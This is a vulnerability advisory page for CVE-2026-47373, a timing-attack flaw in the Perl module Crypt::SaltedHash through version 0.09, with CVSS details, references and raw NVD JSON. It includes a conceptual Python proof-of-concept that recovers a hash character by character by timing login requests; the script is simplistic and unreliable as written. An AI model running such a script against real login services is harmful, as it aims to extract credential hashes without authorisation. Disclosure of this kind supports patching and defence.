Security Vulnerability Report
中文
CVE-2026-47373 CVSS 7.5 HIGH

CVE-2026-47373

Published: 2026-05-20 21:16:18
Last Modified: 2026-05-21 16:04:54
Source: 9b29abf9-4ab0-4765-b253-1875cd9b441e

Description

Crypt::SaltedHash versions through 0.09 for Perl is susceptible to timing attacks. These versions use Perl's built-in eq comparison. Discrepencies in timing could be used to guess the underlying hash.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Crypt::SaltedHash <= 0.09

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for Timing Attack on Crypt::SaltedHash (Conceptual) import requests import time import string # Target endpoint (Hypothetical) TARGET_URL = "http://vulnerable-app/login" # Assume we know the hash format and length (e.g., SHA-256 hex: 64 chars) HASH_LENGTH = 64 CHARSET = string.hexdigits # Variable to store the recovered hash recovered_hash = "" print("[+] Starting Timing Attack...") for i in range(HASH_LENGTH): best_char = None max_time = -1 for char in CHARSET: # Construct payload: known prefix + current guess + padding # The padding ensures the comparison length is consistent if not checking length first test_hash = recovered_hash + char + "0" * (HASH_LENGTH - len(recovered_hash) - 1) payload = {"username": "admin", "password_hash": test_hash} # Measure request time start_time = time.time() try: requests.post(TARGET_URL, data=payload, timeout=5) end_time = time.time() except: end_time = time.time() duration = end_time - start_time # If this character took longer, it's likely the correct match if duration > max_time: max_time = duration best_char = char if best_char: recovered_hash += best_char print(f"[+] Position {i+1}/{HASH_LENGTH}: Found char '{best_char}' (Time: {max_time:.5f}s)") else: print("[-] Attack failed or network instability detected.") break print(f"[+] Recovered Hash: {recovered_hash}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-47373", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-05-20T21:16:17.853", "lastModified": "2026-05-21T16:04:53.813", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Crypt::SaltedHash versions through 0.09 for Perl is susceptible to timing attacks.\n\nThese versions use Perl's built-in eq comparison. Discrepencies in timing could be used to guess the underlying hash."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-208"}]}], "references": [{"url": "https://github.com/robrwo/perl-Crypt-SaltedHash/commit/c07bfc5c23185b0667233d0f2e1252d81f1f027a.patch", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "https://metacpan.org/release/RRWO/Crypt-SaltedHash-0.10/changes", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/20/21", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.